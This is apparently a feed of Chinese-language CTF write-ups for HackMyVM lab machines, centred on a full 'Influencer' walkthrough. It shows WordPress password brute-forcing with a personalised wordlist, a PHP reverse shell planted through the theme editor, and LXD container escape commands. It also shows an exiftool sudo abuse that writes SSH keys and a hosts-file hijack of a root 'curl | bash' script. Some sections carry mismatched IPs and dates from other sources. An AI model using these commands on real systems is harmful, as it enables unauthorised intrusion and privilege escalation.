etc    libx32  private_html  snap  usr
root@8d424afcf40b:/# cd root
root@8d424afcf40b:~# ls
root.txt  snap
root@8d424afcf40b:~# cat root.txt 
8e77a69cc53f51e6f2a03e7e2d9c2219

This rendering was automatically generated by Frosti Feed and may have formatting issues. For the best experience, please visit: https://heathc1iff-sec.github.io/blog/hmvmachines/ephemeral/

HMV-Influencer

呼啸山庄 — Tue, 13 Jan 2026 00:00:00 GMT

信息收集

IP定位

┌──(root㉿kali)-[/home/kali/Desktop/hmv]
└─# arp-scan -l | grep "08:00:27"
192.168.0.109   08:00:27:5f:d9:8d       (Unknown)

Nmap扫描

┌──(root㉿kali)-[/home/kali/Desktop/hmv]
└─# nmap -Pn -sTCV -T4 -p0-65535 192.168.0.109
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-12 12:46 EST
Nmap scan report for 192.168.0.103
Host is up (0.00026s latency).
Not shown: 65534 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.52 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.52 (Ubuntu)
2121/tcp open  ftp     vsftpd 3.0.5
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r--    1 0        0           11113 Jun 09  2023 facebook.jpg
| -rw-r--r--    1 0        0           35427 Jun 09  2023 github.jpg
| -rw-r--r--    1 0        0           88816 Jun 09  2023 instagram.jpg
| -rw-r--r--    1 0        0           27159 Jun 09  2023 linkedin.jpg
| -rw-r--r--    1 0        0              28 Jun 08  2023 note.txt
|_-rw-r--r--    1 0        0          124263 Jun 09  2023 snapchat.jpg
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 192.168.0.106
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.5 - secure, fast, stable
|_End of status
Service Info: OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.06 seconds

ftp-匿名登录

ftp> mget *
mget facebook.jpg [anpqy?]? 
229 Entering Extended Passive Mode (|||15810|)
150 Opening BINARY mode data connection for facebook.jpg (11113 bytes).
100% |***************************************************************| 11113       22.93 MiB/s    00:00 ETA
226 Transfer complete.
11113 bytes received in 00:00 (13.81 MiB/s)
mget github.jpg [anpqy?]? 
229 Entering Extended Passive Mode (|||5962|)
150 Opening BINARY mode data connection for github.jpg (35427 bytes).
100% |***************************************************************| 35427       53.45 MiB/s    00:00 ETA
226 Transfer complete.
35427 bytes received in 00:00 (42.07 MiB/s)
mget instagram.jpg [anpqy?]? 
229 Entering Extended Passive Mode (|||12224|)
150 Opening BINARY mode data connection for instagram.jpg (88816 bytes).
100% |***************************************************************| 88816       63.92 MiB/s    00:00 ETA
226 Transfer complete.
88816 bytes received in 00:00 (54.68 MiB/s)
mget linkedin.jpg [anpqy?]? 
229 Entering Extended Passive Mode (|||40056|)
150 Opening BINARY mode data connection for linkedin.jpg (27159 bytes).
100% |***************************************************************| 27159       52.32 MiB/s    00:00 ETA
226 Transfer complete.
27159 bytes received in 00:00 (38.03 MiB/s)
mget note.txt [anpqy?]? 
229 Entering Extended Passive Mode (|||54131|)
150 Opening BINARY mode data connection for note.txt (28 bytes).
100% |***************************************************************|    28       54.68 KiB/s    00:00 ETA
226 Transfer complete.
28 bytes received in 00:00 (30.34 KiB/s)
mget snapchat.jpg [anpqy?]? 
229 Entering Extended Passive Mode (|||51457|)
150 Opening BINARY mode data connection for snapchat.jpg (124263 bytes).
100% |***************************************************************|   121 KiB   91.58 MiB/s    00:00 ETA
226 Transfer complete.
124263 bytes received in 00:00 (79.21 MiB/s)

┌──(root㉿kali)-[/home/kali/Desktop/hmv]
└─# cat note.txt  
- Change wordpress password

80端口

目录扫描

┌──(root㉿kali)-[/home/kali]
└─# dirsearch -u http://192.168.0.109
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/kali/reports/http_192.168.0.103/_26-01-12_12-51-34.txt

Target: http://192.168.0.103/

[12:51:34] Starting: 
[12:51:35] 403 -  278B  - /.ht_wsr.txt                                      
[12:51:35] 403 -  278B  - /.htaccess.bak1                                   
[12:51:35] 403 -  278B  - /.htaccess.sample                                 
[12:51:35] 403 -  278B  - /.htaccess.orig
[12:51:35] 403 -  278B  - /.htaccess.save                                   
[12:51:35] 403 -  278B  - /.htaccess_extra                                  
[12:51:35] 403 -  278B  - /.htaccess_orig
[12:51:35] 403 -  278B  - /.htaccess_sc
[12:51:35] 403 -  278B  - /.htaccessBAK
[12:51:35] 403 -  278B  - /.htaccessOLD2
[12:51:35] 403 -  278B  - /.htaccessOLD
[12:51:35] 403 -  278B  - /.htm                                             
[12:51:35] 403 -  278B  - /.html                                            
[12:51:35] 403 -  278B  - /.htpasswd_test                                   
[12:51:35] 403 -  278B  - /.htpasswds
[12:51:35] 403 -  278B  - /.httr-oauth                                      
[12:51:35] 403 -  278B  - /.php                                             
[12:51:56] 403 -  278B  - /server-status                                    
[12:51:56] 403 -  278B  - /server-status/
[12:52:03] 200 -   13KB - /wordpress/                                        
[12:52:05] 200 -    2KB - /wordpress/wp-login.php

Task Completed

web界面

¡Hello world!

luna Jun 8, 2023 1 Comments

My name is Luna Shine, and I am thrilled to share my passion for fashion with all of you. Born on June 24, 1997, I have dedicated my life to…

可以得出作者为Luna Shine生日为June 24, 1997

生成字典

┌──(root㉿kali)-[/home/kali/Desktop/hmv]
└─# cupp -i                
/usr/bin/cupp:146: SyntaxWarning: invalid escape sequence '\ '
  print("      \                     # User")
/usr/bin/cupp:147: SyntaxWarning: invalid escape sequence '\ '
  print("       \   \033[1;31m,__,\033[1;m             # Passwords")
/usr/bin/cupp:148: SyntaxWarning: invalid escape sequence '\ '
  print("        \  \033[1;31m(\033[1;moo\033[1;31m)____\033[1;m         # Profiler")
/usr/bin/cupp:149: SyntaxWarning: invalid escape sequence '\ '
  print("           \033[1;31m(__)    )\ \033[1;m  ")
 ___________ 
   cupp.py!                 # Common
      \                     # User
       \   ,__,             # Passwords
        \  (oo)____         # Profiler
           (__)    )\   
              ||--|| *      [ Muris Kurgas | j0rgan@remote-exploit.org ]
                            [ Mebus | https://github.com/Mebus/]


[+] Insert the information about the victim to make a dictionary
[+] If you don't know all the info, just hit enter when asked! ;)

> First Name: luna
> Surname: shine
> Nickname: 
> Birthdate (DDMMYYYY): 24061997


> Partners) name: 
> Partners) nickname: 
> Partners) birthdate (DDMMYYYY): 


> Child's name: 
> Child's nickname: 
> Child's birthdate (DDMMYYYY): 


> Pet's name: 
> Company name: 


> Do you want to add some key words about the victim? Y/[N]: 
> Do you want to add special chars at the end of words? Y/[N]: 
> Do you want to add some random numbers at the end of words? Y/[N]:
> Leet mode? (i.e. leet = 1337) Y/[N]: 

[+] Now making a dictionary...
[+] Sorting list and removing duplicates...
[+] Saving dictionary to luna.txt, counting 2574 words.
[+] Now load your pistolero with luna.txt and shoot! Good luck!

wpscan

说明书

1️⃣ 基本扫描（看看是不是 WordPress）

wpscan --url http://目标/wordpress/

2️⃣ 枚举用户（最重要）

wpscan --url http://目标/wordpress/ -e u

👉 找后台用户名

3️⃣ 枚举插件 + 主题（可选）

wpscan --url http://目标/wordpress/ -e p,t

4️⃣ 枚举用户 + 爆破（常用）

wpscan --url http://目标/wordpress/ -e u -P passwords.txt

👉 自动用 XML-RPC / 登录页试密码

5️⃣ 指定用户名爆破

wpscan --url http://目标/wordpress/ -U admin -P passwords.txt

6️⃣ 加 API Token（推荐）

wpscan --url http://目标/wordpress/ -e u --api-token TOKEN

基本扫描

┌──(root㉿kali)-[/home/kali]
└─# wpscan --url http://192.168.0.109/wordpress 
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.28
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://192.168.0.109/wordpress/ [192.168.0.109]
[+] Started: Mon Jan 12 23:06:26 2026

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.52 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.0.109/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.0.109/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.0.109/wordpress/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.0.109/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 6.9 identified (Latest, released on 2025-12-02).
 | Found By: Rss Generator (Passive Detection)
 |  - http://192.168.0.109/wordpress/index.php/feed/, <generator>https://wordpress.org/?v=6.9</generator>
 |  - http://192.168.0.109/wordpress/index.php/comments/feed/, <generator>https://wordpress.org/?v=6.9</generator>

[+] WordPress theme in use: blogarise
 | Location: http://192.168.0.109/wordpress/wp-content/themes/blogarise/
 | Last Updated: 2026-01-12T00:00:00.000Z
 | Readme: http://192.168.0.109/wordpress/wp-content/themes/blogarise/readme.txt
 | [!] The version is out of date, the latest version is 1.5.0
 | Style URL: http://192.168.0.109/wordpress/wp-content/themes/blogarise/style.css?ver=6.9
 | Style Name: BlogArise
 | Style URI: https://themeansar.com/free-themes/blogarise/
 | Description: BlogArise is a fast, clean, modern-looking Best Responsive News Magazine WordPress theme. The theme ...
 | Author: Themeansar
 | Author URI: http://themeansar.com
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 0.7 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://192.168.0.109/wordpress/wp-content/themes/blogarise/style.css?ver=6.9, Match: 'Version: 0.7'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:00 <=============================> (137 / 137) 100.00% Time: 00:00:00

[i] No Config Backups Found.

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Mon Jan 12 23:06:29 2026
[+] Requests Done: 170
[+] Cached Requests: 5
[+] Data Sent: 46.919 KB
[+] Data Received: 358.4 KB
[+] Memory used: 267.211 MB
[+] Elapsed time: 00:00:03

XML-RPC 开启（最重要）

XML-RPC seems to be enabled
http://192.168.0.109/wordpress/xmlrpc.php

这意味着你可以：

✅ 枚举用户

✅ 绕过登录限制进行爆破

✅ Pingback SSRF（少见，但要试）

枚举用户

-e 是 enumerate（枚举） 的缩写

wpscan --url http://192.168.0.109/wordpress -e u
[i] User(s) Identified:

[+] luna
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://192.168.0.109/wordpress/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Mon Jan 12 23:07:31 2026
[+] Requests Done: 23
[+] Cached Requests: 36
[+] Data Sent: 6.698 KB
[+] Data Received: 84.834 KB
[+] Memory used: 187.789 MB
[+] Elapsed time: 00:00:02

登录爆破

┌──(root㉿kali)-[/home/kali/Desktop/hmv]
└─# wpscan --url http://192.168.0.109/wordpress -e u -P luna.txt
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.28
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://192.168.0.109/wordpress/ [192.168.0.109]
[+] Started: Mon Jan 12 23:10:46 2026

Interesting Finding(s):

[+] luna
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://192.168.0.109/wordpress/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] Performing password attack on Wp Login against 1 user/s
[SUCCESS] - luna / luna_1997                                                                                
Trying luna / luna_1997 Time: 00:00:38 <=============                  > (2120 / 4694) 45.16%  ETA: ??:??:??

[!] Valid Combinations Found:
 | Username: luna, Password: luna_1997

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Mon Jan 12 23:11:27 2026
[+] Requests Done: 2134
[+] Cached Requests: 46
[+] Data Sent: 762.29 KB
[+] Data Received: 14.662 MB
[+] Memory used: 205.406 MB
[+] Elapsed time: 00:00:41

拿到了一份登录凭据luna/luna_1997

通常 WordPress 后台默认路径是：

http://$IP/wordpress/wp-admin/

在Theme File Editor功能点处将index.php写入phpshell文件

┌──(web)─(root㉿kali)-[/home/kali]
└─# pwncat-cs -lp 8888
/root/.pyenv/versions/3.11.9/envs/web/lib/python3.11/site-packages/zodburi/__init__.py:2: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
  from pkg_resources import iter_entry_points
[01:21:22] Welcome to pwncat 🐈!                                                             __main__.py:164
[01:21:24] received connection from 192.168.0.109:50744                                           bind.py:84
[01:21:24] 0.0.0.0:8888: upgrading from /usr/bin/dash to /usr/bin/bash                        manager.py:957
           192.168.0.109:50744: registered new host w/ db                                     manager.py:957
(local) pwncat$ back
(remote) www-data@influencer:/$

图片隐写解密

在ftp中得到了一些图片，这里我们对其进行解密

┌──(web)─(root㉿kali)-[/home/kali/Desktop/hmv]
└─# steghide info snapchat.jpg                 
"snapchat.jpg":
  format: jpeg
  capacity: 5.4 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase: 
  embedded file "backup.txt":
    size: 44.0 Byte
    encrypted: rijndael-128, cbc
    compressed: yes
                                                                                                            
┌──(web)─(root㉿kali)-[/home/kali/Desktop/hmv]
└─# steghide extract -sf snapchat.jpg

Enter passphrase: 
wrote extracted data to "backup.txt".

PASSWORD BACKUP
---------------

u3jkeg97gf

提权

提权-lua

由于我们图片隐写提取出u3jkeg97gf所以尝试密码复用

(remote) www-data@influencer:/home$ ss -atlp
State       Recv-Q      Send-Q           Local Address:Port             Peer Address:Port      Process      
LISTEN      0           128                  127.0.0.1:1212                  0.0.0.0:*                      
LISTEN      0           32                     0.0.0.0:iprop                 0.0.0.0:*                      
LISTEN      0           80                   127.0.0.1:mysql                 0.0.0.0:*                      
LISTEN      0           4096             127.0.0.53%lo:domain                0.0.0.0:*                      
LISTEN      0           511                          *:http                        *:*                      
(remote) www-data@influencer:/home$ netstat -antlp
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 0.0.0.0:2121            0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:1212          0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -                   
tcp        0    284 192.168.0.109:50744     192.168.0.106:8888      ESTABLISHED 12744/sh            
tcp6       0      0 :::80                   :::*                    LISTEN      -                   
tcp6       1      0 192.168.0.109:80        192.168.0.106:52386     CLOSE_WAIT  -                    *:*                      
www-data@influencer:/home$ nc 0.0.0.0 1212
SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1

ss -atlp

-a：显示所有 socket
-t：只看 TCP
-l：只看 LISTEN（监听）
-p：显示进程（没权限会空）

netstat -antlp

-a all
-n 不解析端口名
-t TCP
-l LISTEN
-p process（你没权限）

由于该终端机器上无su功能，没办法切换用户

同时外网扫描中未扫出ssh端口

监听端口确定1212为ssh服务

直接在靶机上ssh建立连接

(remote) www-data@influencer:/home$ ssh luna@0.0.0.0 -p 1212
The authenticity of host '[0.0.0.0]:1212 ([0.0.0.0]:1212)' can't be established.
ED25519 key fingerprint is SHA256:uujkDI7HQ0Bk3td/3NfWys9FNY5cbT1zvGvXbluerAk.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Could not create directory '/var/www/.ssh' (Permission denied).
Failed to add the host to the list of known hosts (/var/www/.ssh/known_hosts).
luna@0.0.0.0's password: 
Welcome to Ubuntu 22.04.2 LTS (GNU/Linux 5.15.0-73-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of mar 13 ene 2026 06:48:21 UTC

  System load:  0.080078125        Processes:               123
  Usage of /:   54.7% of 11.21GB   Users logged in:         0
  Memory usage: 18%                IPv4 address for enp0s3: 192.168.0.109
  Swap usage:   0%


El mantenimiento de seguridad expandido para Applications está desactivado

Se pueden aplicar 0 actualizaciones de forma inmediata.

Active ESM Apps para recibir futuras actualizaciones de seguridad adicionales.
Vea https://ubuntu.com/esm o ejecute «sudo pro status»


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Fri Jun  9 10:12:13 2023
luna@influencer:~$

提权-root

方法一：lxd提权

luna@influencer:~$ sudo -l
Matching Defaults entries for luna on influencer:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User luna may run the following commands on influencer:
    (juan) NOPASSWD: /usr/bin/exiftool
luna@influencer:~$ id
uid=1000(luna) gid=1000(luna) groups=1000(luna),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd)

LXD 提权的本质原理（重点）

当普通用户 属于 **lxd** 组 时，等同于拥有 宿主机 root 级别能力，原因是：

LXD 容器可以 挂载宿主机文件系统
容器内通常以 root 运行
一旦把宿主机 / 挂载进容器，容器内 root = 宿主机 root

👉 所以：
**lxd**** 组 ≈ 隐式 root**

┌──(web)─(root㉿kali)-[/home/kali]
└─# cd Desktop/tools/lxd-alpine-builder 

┌──(web)─(root㉿kali)-[/home/kali/Desktop/tools/lxd-alpine-builder]
└─# python -m http.server 8888
Serving HTTP on 0.0.0.0 port 8888 (http://0.0.0.0:8888/) ...
192.168.0.109 - - [13/Jan/2026 01:52:22] "GET /alpine-v3.23-x86_64-20260112_0553.tar.gz HTTP/1.1" 200 -

luna@influencer:/tmp$ wget http://192.168.0.106:8888/alpine-v3.23-x86_64-20260112_0553.tar.gz
--2026-01-13 06:52:32--  http://192.168.0.106:8888/alpine-v3.23-x86_64-20260112_0553.tar.gz
Connecting to 192.168.0.106:8888... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4113983 (3,9M) [application/gzip]
Saving to: ‘alpine-v3.23-x86_64-20260112_0553.tar.gz’

alpine-v3.23-x86_64-202601 100%[========================================>]   3,92M  --.-KB/s    in 0,02s   

2026-01-13 06:52:32 (192 MB/s) - ‘alpine-v3.23-x86_64-20260112_0553.tar.gz’ saved [4113983/4113983]

1️⃣ 初始化 LXD（第一次必须做）

lxd init --auto

2️⃣ 启动一个特权容器

lxc launch ubuntu:22.04 pwned -c security.privileged=true

3️⃣ 把宿主机根目录 `/` 挂载进容器

lxc config device add pwned hostroot disk source=/ path=/mnt/root recursive=true

4️⃣ 进入容器（你现在是容器内 root）

lxc exec pwned /bin/bash

🎯 此时状态（非常关键）

你是：容器内 root
/mnt/root = 宿主机的 /

你已经拥有宿主机的完全控制权

✅ 直接拿宿主机 root shell（最快）

chroot /mnt/root /bin/bash

root@pwned:/home/juan# cat user.txt 
goodjobbro

root@pwned:~# cat rr00t.txt 
19283712487912

方法二

提权juan

luna@influencer:~$ sudo -l
Matching Defaults entries for luna on influencer:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
 
User luna may run the following commands on influencer:
    (juan) NOPASSWD: /usr/bin/exiftool

https://gtfobins.github.io/gtfobins/exiftool/#sudo

尝试进行读写 juan 的 ssh私钥：

先本地生成一对密钥对

┌──(kalikali)-[~/temp/Influencer]
└─$ ssh-keygen -t rsa -f /home/kali/temp/Influencer/juan
Generating public/private rsa key pair.
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /home/kali/temp/Influencer/juan
Your public key has been saved in /home/kali/temp/Influencer/juan.pub
The key fingerprint is:
SHA256:/xMR+gJtJQiy8EhEtszHXYSkcsG5nJDhuiNWojzpqTk kali@kali
The key's randomart image is:
+---[RSA 3072]----+
| oB+ooo+o.       |
| *o*o*... . o    |
|  BoBo.  . + .   |
| . ++   . + .    |
|.. .    So . .   |
|o.+      .. o    |
|==        .. .   |
|Eoo        ..    |
|++          ..   |
+----[SHA256]-----+
 
┌──(kalikali)-[~/temp/Influencer]
└─$ python3 -m http.server 8888
Serving HTTP on 0.0.0.0 port 8888 (http://0.0.0.0:8888/) ...
192.168.0.139 - - [28/Apr/2024 08:22:18] "GET /juan HTTP/1.1" 200 -
192.168.0.139 - - [28/Apr/2024 08:22:22] "GET /juan.pub HTTP/1.1" 200 -

尝试进行提权 juan 用户：

luna@influencer:/tmp$ wget http://192.168.0.143:8888/juan
--2024-04-28 12:22:19--  http://192.168.0.143:8888/juan
Connecting to 192.168.0.143:8888... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2590 (2,5K) [application/octet-stream]
Saving to: ‘juan’
 
juan                                  100%[=========================================================================>]   2,53K  --.-KB/s    in 0s      
 
2024-04-28 12:22:19 (276 MB/s) - ‘juan’ saved [2590/2590]
 
luna@influencer:/tmp$ wget http://192.168.0.143:8888/juan.pub
--2024-04-28 12:22:23--  http://192.168.0.143:8888/juan.pub
Connecting to 192.168.0.143:8888... connected.
HTTP request sent, awaiting response... 200 OK
Length: 563 [application/vnd.exstream-package]
Saving to: ‘juan.pub’
 
juan.pub                              100%[=========================================================================>]     563  --.-KB/s    in 0s      
 
2024-04-28 12:22:23 (107 MB/s) - ‘juan.pub’ saved [563/563]
 
luna@influencer:/tmp$ mv juan.pub authorized_keys
luna@influencer:/tmp$ sudo -u juan exiftool -filename=/home/juan/.ssh/authorized_keys authorized_keys 
Warning: Error removing old file - authorized_keys
    1 directories created
    1 image files updated
luna@influencer:/tmp$ sudo -u juan exiftool -filename=/home/juan/.ssh/authorized_keys authorized_keys 
Error: '/home/juan/.ssh/authorized_keys' already exists - authorized_keys
    0 image files updated
    1 files weren't updated due to errors
luna@influencer:/tmp$ chmod 600 juan
luna@influencer:/tmp$ ssh juan@0.0.0.0 -p 1212 -i juan
The authenticity of host '[0.0.0.0]:1212 ([0.0.0.0]:1212)' can't be established.
ED25519 key fingerprint is SHA256:uujkDI7HQ0Bk3td/3NfWys9FNY5cbT1zvGvXbluerAk.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[0.0.0.0]:1212' (ED25519) to the list of known hosts.
Welcome to Ubuntu 22.04.2 LTS (GNU/Linux 5.15.0-73-generic x86_64)
 
 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
 
  System information as of dom 28 abr 2024 12:25:44 UTC
 
  System load:  0.0                Processes:               128
  Usage of /:   55.9% of 11.21GB   Users logged in:         1
  Memory usage: 45%                IPv4 address for enp0s3: 192.168.0.139
  Swap usage:   0%
 
 * Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
   just raised the bar for easy, resilient and secure K8s cluster deployment.
 
   https://ubuntu.com/engage/secure-kubernetes-at-the-edge
 
El mantenimiento de seguridad expandido para Applications está desactivado
 
Se pueden aplicar 0 actualizaciones de forma inmediata.
 
Active ESM Apps para recibir futuras actualizaciones de seguridad adicionales.
Vea https://ubuntu.com/esm o ejecute «sudo pro status»
 
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
 
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
 
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
 
juan@influencer:~$

提权 root

第一步还是信息搜集：

juan@influencer:~$ sudo -l
Matching Defaults entries for juan on influencer:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
 
User juan may run the following commands on influencer:
    (root) NOPASSWD: /bin/bash /home/juan/check.sh
juan@influencer:~$ cat /home/juan/check.sh
#!/bin/bash
 
/usr/bin/curl http://server.hmv/98127651 | /bin/bash

我再次检查了 sudo 权限。Juan 可以作为 root 用户运行文件“/home/john/check.sh”。

又是 arp 欺骗：

juan@influencer:~$ cat /home/juan/check.sh 
#!/bin/bash

/usr/bin/curl http://server.hmv/98127651 | /bin/bash

如你所见，它会向 server.hmv 发送请求，然后执行它收到的请求。

我还检查了修改“/etc/hosts”的权限，所以更改域名地址很方便。

juan@influencer:~$ ls -la /etc/hosts
-rw-rw-rw- 1 root juan 247 jun  8 23:00 /etc/hosts

我让 server.hmv 指向攻击机器的地址。

juan@influencer:~$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 influencer

# The following lines are desirable for IPv6 capable hosts
::1     ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

#127.0.0.1 server.hmv
192.168.1.86 server.hmv

在我的机器上，我创建一个与“check.sh”脚本中名称相同的文件，然后在 80 端口启动服务器。

kali@kali:~/Desktop$ cat 98127651        
chmod +s /bin/bash
                                                                                                                    
kali@kali:~/Desktop$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

以 root 身份运行脚本会发出请求并执行我创建的脚本，所以现在 /bin/bash 拥有了 SUID 权限，获取 root 权限变得轻而易举。

juan@influencer:~$ sudo /bin/bash /home/juan/check.sh
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100    19  100    19    0     0    606      0 --:--:-- --:--:-- --:--:--   612
juan@influencer:~$ ls -la /bin/bash
-rwsr-sr-x 1 root root 1396520 ene  6  2022 /bin/bash
juan@influencer:~$ bash -p
bash-5.1# whoami
root
bash-5.1# :)

This rendering was automatically generated by Frosti Feed and may have formatting issues. For the best experience, please visit: https://heathc1iff-sec.github.io/blog/hmvmachines/influencer/

HMV-Meltdown

呼啸山庄 — Tue, 13 Jan 2026 00:00:00 GMT

信息收集

IP定位

┌──(web)─(root㉿kali)-[/home/kali]
└─# arp-scan -l | grep "08:00:27"
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
192.168.0.102   08:00:27:99:3b:9e       (Unknown)

nmap扫描

┌──(web)─(root㉿kali)-[/home/kali]
└─# nmap -Pn -sTCV -T4 -p0-65535 192.168.0.102
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-13 03:12 EST
Nmap scan report for 192.168.0.102
Host is up (0.00034s latency).
Not shown: 65534 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open  http    Apache httpd 2.4.62 ((Debian))
|_http-server-header: Apache/2.4.62 (Debian)
| http-cookie-flags: 
